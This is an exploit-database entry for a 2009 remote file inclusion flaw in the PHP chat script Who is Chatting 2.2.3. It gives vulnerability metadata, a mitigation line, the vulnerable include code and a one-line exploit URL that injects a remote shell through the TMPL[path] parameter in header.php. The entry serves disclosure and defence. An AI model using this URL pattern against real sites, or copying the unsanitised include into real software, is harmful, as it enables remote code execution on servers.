header-logo
Suggest Exploit
vendor:
Who is Chatting
by:
lumut--
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Who is Chatting
Affected Version From: 2.2.3
Affected Version To: 2.2.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:familycms:who_is_chatting:2.2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Who is Chatting 2.2.3 Remote File Include Vulnerability

A vulnerability exists in Who is Chatting 2.2.3, which allows an attacker to include a remote file via the TMPL[path] parameter in the header.php file. This can be exploited to execute arbitrary PHP code by including a malicious PHP file from a remote location.

Mitigation:

Upgrade to the latest version of Who is Chatting 2.2.3 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

*=======================================================
Who is Chatting 2.2.3 Remote File Include Vulnerability
=======================================================

# Author         : lumut--
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs           :

<?
$chat_inc = $TMPL[\'path\'] . \"inc/chatting_inc.php\";
include_once ($chat_inc);
?>

# Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]

# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet,
manadocoding*

Navigation

Suggest Exploit

Services By CQR